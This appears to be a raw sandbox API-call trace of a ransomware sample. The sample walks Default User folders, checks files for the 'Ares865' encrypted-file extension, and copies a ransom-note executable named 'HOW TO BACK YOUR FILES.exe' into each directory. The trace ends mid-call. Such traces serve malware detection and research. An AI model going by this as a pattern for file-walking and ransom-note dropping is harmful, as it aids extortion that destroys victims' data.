[0042.394] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.394] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.394] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="CurrentDatabase_372.wmdb.Ares865" | out: lpString1="CurrentDatabase_372.wmdb.Ares865") returned="CurrentDatabase_372.wmdb.Ares865" [0042.394] lstrlenW (lpString="CurrentDatabase_372.wmdb.Ares865") returned 32 [0042.394] lstrlenW (lpString="Ares865") returned 7 [0042.395] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0042.395] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a90cce0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a90cce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.395] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.395] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x11370, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalMLS_3.wmdb.Ares865", cAlternateFileName="LOCALM~1.ARE")) returned 1 [0042.395] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.395] lstrcmpiW (lpString1="LocalMLS_3.wmdb.Ares865", lpString2="aoldtz.exe") returned 1 [0042.395] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="LocalMLS_3.wmdb.Ares865" | out: lpString1="LocalMLS_3.wmdb.Ares865") returned="LocalMLS_3.wmdb.Ares865" [0042.395] lstrlenW (lpString="LocalMLS_3.wmdb.Ares865") returned 23 [0042.395] lstrlenW (lpString="Ares865") returned 7 [0042.395] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0042.395] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 1 [0042.395] lstrcmpiW (lpString1="Sync Playlists", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.395] lstrcmpiW (lpString1="Sync Playlists", lpString2="aoldtz.exe") returned 1 [0042.395] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="Sync Playlists" | out: lpString1="Sync Playlists") returned="Sync Playlists" [0042.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb8) returned 0x2f2fc8 [0042.395] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.395] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 0 [0042.395] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.395] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0042.395] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0042.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.395] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned 91 [0042.396] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.396] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.396] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.396] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.396] GetLastError () returned 0x0 [0042.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.396] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.396] CloseHandle (hObject=0x118) returned 1 [0042.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.396] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.397] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.397] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.397] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.397] lstrcpyW (in: lpString1=0x2e2e918, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0042.397] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.397] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc4) returned 0x2cbb78 [0042.397] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.397] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aad5d60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.397] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.397] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aad5d60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0042.397] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.397] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0042.397] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbb78 | out: hHeap=0x2b0000) returned 1 [0042.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.397] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 97 [0042.397] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.397] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.397] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.398] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.398] GetLastError () returned 0x0 [0042.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.398] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.398] CloseHandle (hObject=0x118) returned 1 [0042.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.398] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.398] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.398] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.398] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.398] lstrcpyW (in: lpString1=0x2e2e924, lpString2="00010C6E" | out: lpString1="00010C6E") returned="00010C6E" [0042.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd6) returned 0x2cbdb0 [0042.399] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.399] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aafbec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.399] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.399] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aafbec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0042.399] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.399] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0042.399] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0042.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.399] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned 106 [0042.399] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.399] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.399] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.399] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.400] GetLastError () returned 0x0 [0042.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.400] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.400] CloseHandle (hObject=0x118) returned 1 [0042.400] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.400] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.400] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.400] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.400] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.400] lstrcpyW (in: lpString1=0x2e2e936, lpString2="01_Music_auto_rated_at_5_stars.wpl" | out: lpString1="01_Music_auto_rated_at_5_stars.wpl") returned="01_Music_auto_rated_at_5_stars.wpl" [0042.400] lstrlenW (lpString="01_Music_auto_rated_at_5_stars.wpl") returned 34 [0042.400] lstrlenW (lpString="Ares865") returned 7 [0042.400] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0042.400] lstrcpyW (in: lpString1=0x2e2e936, lpString2="02_Music_added_in_the_last_month.wpl" | out: lpString1="02_Music_added_in_the_last_month.wpl") returned="02_Music_added_in_the_last_month.wpl" [0042.400] lstrlenW (lpString="02_Music_added_in_the_last_month.wpl") returned 36 [0042.400] lstrlenW (lpString="Ares865") returned 7 [0042.400] lstrcmpiW (lpString1="nth.wpl", lpString2="Ares865") returned 1 [0042.400] lstrcpyW (in: lpString1=0x2e2e936, lpString2="03_Music_rated_at_4_or_5_stars.wpl" | out: lpString1="03_Music_rated_at_4_or_5_stars.wpl") returned="03_Music_rated_at_4_or_5_stars.wpl" [0042.400] lstrlenW (lpString="03_Music_rated_at_4_or_5_stars.wpl") returned 34 [0042.400] lstrlenW (lpString="Ares865") returned 7 [0042.400] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0042.401] lstrcpyW (in: lpString1=0x2e2e936, lpString2="04_Music_played_in_the_last_month.wpl" | out: lpString1="04_Music_played_in_the_last_month.wpl") returned="04_Music_played_in_the_last_month.wpl" [0042.401] lstrlenW (lpString="04_Music_played_in_the_last_month.wpl") returned 37 [0042.401] lstrlenW (lpString="Ares865") returned 7 [0042.401] lstrcmpiW (lpString1="nth.wpl", lpString2="Ares865") returned 1 [0042.401] lstrcpyW (in: lpString1=0x2e2e936, lpString2="05_Pictures_taken_in_the_last_month.wpl" | out: lpString1="05_Pictures_taken_in_the_last_month.wpl") returned="05_Pictures_taken_in_the_last_month.wpl" [0042.401] lstrlenW (lpString="05_Pictures_taken_in_the_last_month.wpl") returned 39 [0042.401] lstrlenW (lpString="Ares865") returned 7 [0042.401] lstrcmpiW (lpString1="nth.wpl", lpString2="Ares865") returned 1 [0042.401] lstrcpyW (in: lpString1=0x2e2e936, lpString2="06_Pictures_rated_4_or_5_stars.wpl" | out: lpString1="06_Pictures_rated_4_or_5_stars.wpl") returned="06_Pictures_rated_4_or_5_stars.wpl" [0042.401] lstrlenW (lpString="06_Pictures_rated_4_or_5_stars.wpl") returned 34 [0042.401] lstrlenW (lpString="Ares865") returned 7 [0042.401] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0042.401] lstrcpyW (in: lpString1=0x2e2e936, lpString2="07_TV_recorded_in_the_last_week.wpl" | out: lpString1="07_TV_recorded_in_the_last_week.wpl") returned="07_TV_recorded_in_the_last_week.wpl" [0042.401] lstrlenW (lpString="07_TV_recorded_in_the_last_week.wpl") returned 35 [0042.401] lstrlenW (lpString="Ares865") returned 7 [0042.401] lstrcmpiW (lpString1="eek.wpl", lpString2="Ares865") returned 1 [0042.401] lstrcpyW (in: lpString1=0x2e2e936, lpString2="08_Video_rated_at_4_or_5_stars.wpl" | out: lpString1="08_Video_rated_at_4_or_5_stars.wpl") returned="08_Video_rated_at_4_or_5_stars.wpl" [0042.401] lstrlenW (lpString="08_Video_rated_at_4_or_5_stars.wpl") returned 34 [0042.401] lstrlenW (lpString="Ares865") returned 7 [0042.401] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0042.401] lstrcpyW (in: lpString1=0x2e2e936, lpString2="09_Music_played_the_most.wpl" | out: lpString1="09_Music_played_the_most.wpl") returned="09_Music_played_the_most.wpl" [0042.401] lstrlenW (lpString="09_Music_played_the_most.wpl") returned 28 [0042.401] lstrlenW (lpString="Ares865") returned 7 [0042.401] lstrcmpiW (lpString1="ost.wpl", lpString2="Ares865") returned 1 [0042.401] lstrcpyW (in: lpString1=0x2e2e936, lpString2="10_All_Music.wpl" | out: lpString1="10_All_Music.wpl") returned="10_All_Music.wpl" [0042.402] lstrlenW (lpString="10_All_Music.wpl") returned 16 [0042.402] lstrlenW (lpString="Ares865") returned 7 [0042.402] lstrcmpiW (lpString1="sic.wpl", lpString2="Ares865") returned 1 [0042.402] lstrcpyW (in: lpString1=0x2e2e936, lpString2="11_All_Pictures.wpl" | out: lpString1="11_All_Pictures.wpl") returned="11_All_Pictures.wpl" [0042.402] lstrlenW (lpString="11_All_Pictures.wpl") returned 19 [0042.402] lstrlenW (lpString="Ares865") returned 7 [0042.402] lstrcmpiW (lpString1="res.wpl", lpString2="Ares865") returned 1 [0042.402] lstrcpyW (in: lpString1=0x2e2e936, lpString2="12_All_Video.wpl" | out: lpString1="12_All_Video.wpl") returned="12_All_Video.wpl" [0042.402] lstrlenW (lpString="12_All_Video.wpl") returned 16 [0042.402] lstrlenW (lpString="Ares865") returned 7 [0042.402] lstrcmpiW (lpString1="deo.wpl", lpString2="Ares865") returned 1 [0042.402] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer" [0042.402] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbac8 | out: hHeap=0x2b0000) returned 1 [0042.402] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0042.402] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer") returned 81 [0042.402] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer" [0042.402] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.402] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.403] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.403] GetLastError () returned 0x0 [0042.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.403] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.403] CloseHandle (hObject=0x118) returned 1 [0042.403] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.403] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.403] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 